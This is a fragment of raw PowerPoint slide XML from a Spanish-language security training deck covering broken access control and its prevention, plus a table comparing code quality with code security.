              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08C4014-DFDA-2CCD-7120-6E4734F5CEA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3832992" y="1495036"/>
            <a:ext cx="4498451" cy="1208231"/>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3983EDA-713E-F883-ED86-8EE5C4FD2803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3843251" y="1925834"/>
            <a:ext cx="3803185" cy="2403145"/>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5651C3AE-C289-D239-D04B-09D1B08E64D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4157079" y="2203444"/>
            <a:ext cx="4253639" cy="211954"/>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4E4117A8-C1D5-8D62-EB3A-58D6115AA017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4059683" y="2865784"/>
            <a:ext cx="3822770" cy="1188644"/>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C329AE15-3BC5-7286-6F1C-E83C60BDF469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3972062" y="1664445"/>
            <a:ext cx="4351563" cy="1661520"/>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183574C1-FDDF-ABE8-D3CB-76C95D840DDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4315292" y="3815529"/>
            <a:ext cx="3577958" cy="297357"/>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A61BB72D-F4DC-F578-63FF-A4F1A4530E6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3973114" y="2839462"/>
            <a:ext cx="4351565" cy="1485220"/>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E3CC04D-5ED1-BC32-61BD-3C27EEF08362}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4002986" y="4749212"/>
            <a:ext cx="3401693" cy="25856"/>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82DE2DAF-687B-CBC8-99CD-54FE3358C36C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4688959" y="3661881"/>
            <a:ext cx="2921861" cy="1612545"/>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99FDAD61-9BC5-DA7C-5E92-EC9D5D58D9FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4404851" y="5287594"/>
            <a:ext cx="3127504" cy="701668"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C63EC0EF-6467-B88C-CDA6-D38C985D4AB3}"/>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89758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0490D-F41F-F3D1-B5E5-A727AEE3A66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A5C9AC8-7796-4F23-5F59-7F31D95B2EE6}"/>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8E03F20-7C62-D071-3048-FD9E22EC56D2}"/>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01. Control de Acceso roto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA095823-DFB5-D0C7-31DF-2A07A533987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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2391D09D-1B67-7C43-399E-EA857D538F33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512564" y="4549898"/>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Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BEB468C-41E9-8716-1E28-149E35F447DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512564" y="2936757"/>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Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{351F5A0D-4F03-BA63-6064-B08D3414B540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1779635" y="1409250"/>
            <a:ext cx="6726007"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Acceso a funciones y/o datos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>no autorizados</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, acceder a las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cuentas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>o modificar los datos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>otros usuarios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, cambiar los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>derechos de acceso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A47C3EC6-1D2E-E64D-D009-4C46207377D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1779638" y="3218551"/>
            <a:ext cx="6726007"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Eludir las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>comprobaciones de control de acceso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, elevación de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>privilegios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D675677A-B690-3210-88D3-3FA37C07C132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1779635" y="4584589"/>
            <a:ext cx="6726007"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Prevención mediante el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>registro de fallos de control de acceso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>alertar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> cuando sea apropiado, desactivación del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>listado de directorios del servidor web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Imagen 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48F78411-761A-D7FE-A055-AEB4104EC5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642" y="3092444"/>
            <a:ext cx="762000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Imagen 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC6CBDC3-2512-C0DC-6AFD-726DEEE37E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013" y="4721348"/>
            <a:ext cx="762000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="004C41"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAB82478-C750-3EDB-58BC-B5A64EFF1261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512564" y="1226764"/>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Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Imagen 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DF7F5BD-16DE-075B-E76B-54E7B2B15A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013" y="1398214"/>
            <a:ext cx="762000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="004C41"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Imagen 50" descr="Una puerta de madera&#10;&#10;Descripción generada automáticamente con confianza media">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED8CA66-2074-5165-92FC-639A288923CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9214059" y="1240611"/>
            <a:ext cx="2980026" cy="4544307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AFD3753-9CFE-A90A-0DD2-2C94DF339DB5}"/>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8455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828D-CFCF-8F1E-5D8B-6A634AD6868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A615266-073B-3570-871A-F83BF3F4900A}"/>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8B9CEDD-2C7B-C57B-430A-65B15A64DAC7}"/>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Relación de la calidad y seguridad del código</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9080D6C7-0B8C-B124-253B-B078813E201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4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3511960-90CC-F9E2-DFF1-5FD782EF0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104" y="4006697"/>
            <a:ext cx="405746" cy="405746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagen 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF7F6150-2BBE-8E01-B198-1850701E7E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3104" y="2819892"/>
            <a:ext cx="405746" cy="405746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BA5F37D-FB9E-1720-01C9-91184E81A2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3104" y="5612599"/>
            <a:ext cx="405746" cy="405746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectángulo 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7477A81-3F72-6BAB-D6C4-E6F33FD04BC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1536191"/>
            <a:ext cx="9737666" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La relación entre calidad y seguridad del código es esencial en el desarrollo de software.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Tabla 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25B8846D-0E93-D060-26E7-2C71164F70F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1178895094"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1074532" y="2126784"/>
          <a:ext cx="9445834" cy="3891562"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1945591">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1857541892"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3747109">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2438510974"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3753134">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="889022334"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="342683">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="es-ES" sz="1400"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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Calidad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3330"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1400" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Seguridad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3330"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="889174946"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="844971">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Objetivo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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Funcionalidad, eficiencia y experiencia del usuario.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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Garantizar estar libre de riesgos.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55106"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1351954">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1400" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Requisitos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b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Requisitos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1400" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> propios de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>calidad</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1400" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
